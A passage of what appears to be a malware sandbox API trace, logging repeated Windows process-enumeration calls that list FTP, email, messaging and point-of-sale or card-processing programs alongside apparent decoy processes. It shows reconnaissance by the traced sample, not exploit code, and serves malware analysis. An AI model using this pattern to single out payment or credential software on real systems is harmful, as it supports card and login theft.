lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0259.893] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0259.896] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0259.899] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0259.901] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0259.908] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0259.910] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0259.913] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0259.915] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0259.917] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0259.923] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0259.926] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0259.928] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0259.930] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0259.933] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0260.035] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0260.037] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0260.039] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0260.040] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0260.042] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0260.047] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0260.049] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0260.051] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0260.053] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0260.054] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0260.056] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0260.058] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0260.063] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0260.064] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0260.067] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0260.068] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0260.070] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0260.072] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0260.074] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.102] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.103] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.108] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.110] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.111] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0260.113] CloseHandle (hObject=0x17b0) returned 1 [0260.113] Sleep (dwMilliseconds=0x64) [0260.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0260.245] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.250] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.252] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.253] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.255] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.258] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.259] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.261] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.265] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.267] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.269] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.270] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.272] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.274] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.276] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.297] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.300] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.302] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.304] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.306] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0260.307] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0260.311] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.313] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.314] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0260.316] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0260.317] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0260.319] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.320] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.322] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0260.323] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.327] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.329] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0260.331] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0260.332] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0260.334] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0260.336] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0260.338] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0260.339] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0260.414] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0260.415] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0260.416] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0260.418] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0260.420] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0260.421] Process32Next (in: hSnapshot=0x758, 